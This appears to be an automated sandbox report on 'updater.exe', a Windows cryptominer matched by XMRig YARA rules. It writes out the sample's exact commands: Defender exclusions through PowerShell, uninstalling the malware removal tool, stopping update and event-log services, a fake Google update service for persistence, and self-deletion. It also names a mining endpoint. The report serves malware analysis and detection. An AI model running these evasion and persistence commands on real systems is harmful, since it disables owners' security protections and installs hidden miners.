          Source: svchost.exe, 0000003E.00000003.345290459404.00000254DD671000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://minerchenzhi888.top/api/endpoint.phphlhwzjwrxrewbblx
          Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://172.94.1q
          Source: svchost.exe, 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmpString found in binary or memory: https://xmrig.com/docs/algorithms

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
          Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
          Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 6248, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
          Uses powercfg.exe to modify the power settings
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Windows\System32\svchost.exeProcess Stats: CPU usage > 6%
          Source: C:\Users\user\Desktop\updater.exeCode function: 0_2_00007FF6568E1394 NtRollbackTransaction,0_2_00007FF6568E1394
          Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 36_2_00007FF758EE1394 NtCreateProcessEx,36_2_00007FF758EE1394
          Source: C:\Windows\System32\conhost.exeCode function: 60_2_0000000140001394 NtThawTransactions,60_2_0000000140001394
          Source: C:\ProgramData\Google\Chrome\updater.exeFile created: C:\Windows\TEMP\zlvyxohjpfnw.sysJump to behavior
          Source: C:\Users\user\Desktop\updater.exeFile deleted: C:\Windows\System32\MRT.exeJump to behavior
          Source: C:\Users\user\Desktop\updater.exeCode function: 0_2_00007FF6568E67790_2_00007FF6568E6779
          Source: C:\Users\user\Desktop\updater.exeCode function: 0_2_00007FF6568E67790_2_00007FF6568E6779
          Source: C:\Users\user\Desktop\updater.exeCode function: 0_2_00007FF6568E67790_2_00007FF6568E6779
          Source: C:\Users\user\Desktop\updater.exeCode function: 0_2_00007FF6568E67790_2_00007FF6568E6779
          Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 36_2_00007FF758EE677936_2_00007FF758EE6779
          Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 36_2_00007FF758EE677936_2_00007FF758EE6779
          Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 36_2_00007FF758EE677936_2_00007FF758EE6779
          Source: C:\ProgramData\Google\Chrome\updater.exeCode function: 36_2_00007FF758EE677936_2_00007FF758EE6779
          Source: C:\Windows\System32\conhost.exeCode function: 60_2_000000014000316060_2_0000000140003160
          Source: C:\Windows\System32\conhost.exeCode function: 60_2_00000001400026E060_2_00000001400026E0
          Source: Joe Sandbox ViewDropped File: C:\Windows\Temp\zlvyxohjpfnw.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
          Source: C:\Users\user\Desktop\updater.exeCode function: String function: 00007FF6568E1394 appears 33 times
          Source: C:\ProgramData\Google\Chrome\updater.exeCode function: String function: 00007FF758EE1394 appears 33 times
          Source: updater.exe, 00000024.00000003.345289244338.0000022A746B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWinRing0.sys2 vs updater.exe
          Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
          Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
          Source: 62.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: 0000003E.00000002.346490696563.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: Process Memory Space: svchost.exe PID: 6248, type: MEMORYSTRMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
          Source: zlvyxohjpfnw.sys.36.drBinary string: \Device\WinRing0_1_2_0
          Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@93/12@2/2
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3628:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3020:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4344:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:608:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:448:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5956:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2624:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:284:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:284:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1632:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4668:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4356:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5956:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4344:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3336:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3628:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1632:120:WilError_03
          Source: C:\Windows\System32\svchost.exeMutant created: \BaseNamedObjects\Global\hlhwzjwrxrewbblx
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7496:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3224:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3336:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6792:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2264:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2624:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:448:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3020:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:608:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4356:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7496:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6236:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1244:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5816:304:WilStaging_02
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7380:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_off4oeim.vh2.ps1Jump to behavior
          Source: updater.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
          Source: C:\Users\user\Desktop\updater.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: updater.exeReversingLabs: Detection: 95%
          Source: updater.exeVirustotal: Detection: 82%
          Source: C:\Users\user\Desktop\updater.exeFile read: C:\Users\user\Desktop\updater.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\updater.exe "C:\Users\user\Desktop\updater.exe"
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\updater.exe"
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\ProgramData\Google\Chrome\updater.exe C:\ProgramData\Google\Chrome\updater.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\choice.exe choice /C Y /N /D Y /T 3
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
          Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
          Source: C:\Windows\System32\powercfg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\svchost.exe svchost.exe
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
          Source: C:\Users\user\Desktop\updater.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvcJump to behavior
